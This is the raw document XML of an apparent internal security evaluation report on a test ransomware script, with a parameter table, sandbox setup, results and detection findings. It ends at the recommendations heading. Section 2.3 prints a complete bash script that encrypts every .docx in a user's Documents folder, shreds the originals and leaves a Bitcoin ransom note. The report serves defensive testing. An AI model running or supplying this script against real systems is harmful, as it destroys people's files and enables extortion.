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480" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Security Evaluation Task: Backup Encryption Script Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Document Reference:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> SEC-EVAL-{PLACEHOLDER_DATE}-{PLACEHOLDER_ID}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Classification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Internal Use Only</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Evaluator:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_EVALUATOR_NAME}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Date of Assessment:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_DATE}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This document outlines the security evaluation of a proposed backup encryption script designed to test organizational resilience against ransomware-like behavior. The script under review uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>AES-256-CBC</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> encryption to recursively encrypt all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files located within a user's Documents folder. Following encryption, the script deletes the original plaintext files and creates a ransom note named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>README.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> in the same directory. This evaluation is conducted in a controlled, isolated environment to assess detection capabilities, recovery procedures, and the potential impact of such an attack vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="320" w:after="320"/>
        <w:ind w:start="320" w:end="320" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t>IMPORTANT NOTICE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> This script is intended for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t>authorized security testing only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a sandboxed virtual machine. Do not execute on production systems or personal data. All testing must comply with {PLACEHOLDER_COMPANY_NAME} cybersecurity policies and applicable laws. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Script Specification and Behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2.1 Core Functionality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The script performs the following sequential operations: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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Recursive file discovery:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to locate all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>$HOME/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>AES-256-CBC encryption:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Applies OpenSSL with a randomly generated 256-bit key and initialization vector (IV). The encrypted output is saved with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.enc</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> extension.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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Original file deletion:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Removes the unencrypted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>shred</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>rm -f</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to prevent recovery.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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Ransom note creation:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Writes a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>README.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> file containing payment instructions and a threat message. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2.2 Encryption Parameters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37"/>
        <w:gridCol w:w="4562"/>
        <w:gridCol w:w="3840"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3840" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937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Cipher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562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>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>AES-256-CBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3840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NIST-approved symmetric block cipher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937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Key length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562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256 bits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3840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 xml:space="preserve">Generated via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>openssl rand 32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937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IV length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562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128 bits (16 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3840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Random per file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937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Key storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562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 xml:space="preserve">Written to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/tmp/.key_{PLACEHOLDER_ID}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3840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Insecurely stored for testing purposes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937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Encrypted extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562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>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>.enc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3840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Appended to original filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2.3 Example Script Snippet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:start="240" w:end="240" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="DDDDDD"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="DDDDDD"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash # Security Test Script - DO NOT USE ON LIVE SYSTEMS DOCS_DIR="$HOME/Documents" KEY_FILE="/tmp/.key_$(date +%s)" README="$DOCS_DIR/README.txt" # Generate encryption key openssl rand -hex 32 &gt; "$KEY_FILE" # Encrypt all .docx files recursively find "$DOCS_DIR" -type f -name "*.docx" | while read -r file; do openssl enc -aes-256-cbc -salt -in "$file" \ -out "${file}.enc" -pass file:"$KEY_FILE" shred -u "$file" 2&gt;/dev/null || rm -f "$file" done # Create ransom note cat &gt; "$README" &lt;&lt; 'EOF' YOUR DOCUMENTS HAVE BEEN ENCRYPTED. Send 0.5 BTC to {PLACEHOLDER_BTC_ADDRESS} for decryption key. Contact: {PLACEHOLDER_ATTACKER_EMAIL} EOF </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Test Environment Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The evaluation was conducted using the following controlled environment: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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Operating System:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Ubuntu 22.04 LTS (sandboxed VM)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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>OpenSSL Version:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 3.0.2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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Test Document:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> A single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> file containing the text: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>"This is a test document."</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>User Account:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Non-privileged user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>testuser</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Monitoring Tools:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>inotifywait</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Evaluation Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4.1 Encryption Success Rate</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1147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58"/>
        <w:gridCol w:w="2168"/>
        <w:gridCol w:w="2573"/>
        <w:gridCol w:w="2318"/>
        <w:gridCol w:w="2453"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Test Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Files Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Deleted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2453" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>README Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958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Run 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2453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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958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Run 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2453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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958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Run 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2453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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4.2 Detection Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following security controls were tested for their ability to detect the script's execution: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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>File integrity monitoring (AIDE):</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Detected mass file changes within 60 seconds.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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Process monitoring:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>shred</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> processes were logged.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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Network detection:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> No outbound connections were made (script is offline).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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Antivirus (ClamAV):</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Did not flag the script as malicious (expected in test environment). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Recommendations and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
